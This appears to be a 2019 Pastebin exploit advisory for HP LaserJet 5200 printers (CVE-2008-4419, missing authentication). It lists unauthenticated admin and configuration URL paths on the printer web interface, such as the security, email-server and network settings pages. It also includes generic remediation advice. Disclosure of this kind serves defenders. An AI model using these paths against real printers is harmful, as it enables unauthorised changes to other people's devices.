Advertisement
KingSkrupellos

HP LaserJet 5200 Printers Bypass Missing Auth

Apr 1st, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.01 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : HP LaserJet 5200 Printers 6.7.0.x Bypass Missing Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/03/2019
  7. # Vendor Homepage : hp.com
  8. # Software Information Link :
  9. support.hp.com/gb-en/drivers/selfservice/hp-laserjet-5200-printer-series/1137934
  10. # Software Version :
  11. Driver-Universal Print Driver for Managed Services => 6.7.0.23989
  12. Driver-Universal Print Driver => Version 6.1.0.20062 and 6.7.0.23989
  13. Printer Model Number => Q7545A
  14. HP ChaiServer => Version 1.0
  15. Driver-Universal Print Driver for Managed Services => Version
  16. Driver-USB => Version 7.0.0.29 and 08.290.2
  17. Printer Model => Q7545A
  18. Model Number => J7949E
  19. Firmware Version => V.33.19.FF - 20091124 08.090.3 - 08.062.0
  20. Software Universal Printer Driver => Version 1.8.6
  21. # Tested On : Windows and Linux
  22. # Category : WebApps
  23. # Exploit Risk : High
  24. # CVE : CVE-2008-4419
  25. # Vulnerability Type : CWE-306 [ Missing Authentication for Critical Function ]
  26. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  27. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  28. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  29.  
  30. ############################################################################################
  31.  
  32. # Description about Software :
  33. ***************************
  34. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
  35.  
  36. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
  37.  
  38. ############################################################################################
  39.  
  40. # Impact :
  41. ***********
  42. The software does not perform any authentication for functionality that requires a provable user identity
  43.  
  44. or consumes a significant amount of resources.
  45.  
  46. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
  47.  
  48. affected application and change configuration settings or gain administrative access.
  49.  
  50. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
  51.  
  52. Developing a fix would require understanding of the current application security model and implemented access controls.
  53.  
  54. Three basic rules however can help you eliminate potential improper authorization issues:
  55.  
  56. 1) Identify all privileged assets within your application (web pages that display sensitive data,
  57. website sections that contain privileged/administrative functionality, etc.)
  58.  
  59. 2) Identify user roles within the application and their access permissions
  60.  
  61. 3) Always check if the user should have privileges to access the asset
  62.  
  63. ############################################################################################
  64.  
  65. # Bypass Missing Authentication Exploit / Vulnerability :
  66. *************************************************
  67. /hp/device/this.LCDispatcher
  68.  
  69. /hp/device/this.LCDispatcher?nav=hp.EmailServer
  70.  
  71. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
  72.  
  73. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
  74.  
  75. /hp/device/this.LCDispatcher?nav=hp.Alerts
  76.  
  77. /hp/device/this.LCDispatcher?nav=hp.AutoSend
  78.  
  79. /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
  80.  
  81. /hp/device/this.LCDispatcher?nav=hp.OtherLinks
  82.  
  83. /hp/device/this.LCDispatcher?nav=hp.Config
  84.  
  85. /hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
  86.  
  87. /hp/jetdirect
  88.  
  89. /config_pro.htm
  90. /tcpipv6.htm
  91. /tcpipv4.htm
  92.  
  93. /tcp_param.htm
  94. /network_id.htm
  95.  
  96. /tcp_summary.htm
  97. /index_info.htm
  98.  
  99. /support_param.html
  100. /support.htm
  101.  
  102. /tcp_diag.htm
  103. /configpage.htm
  104.  
  105. /tcp_param.htm
  106. /network_id.htm
  107.  
  108. ############################################################################################
  109.  
  110. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  111.  
  112. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement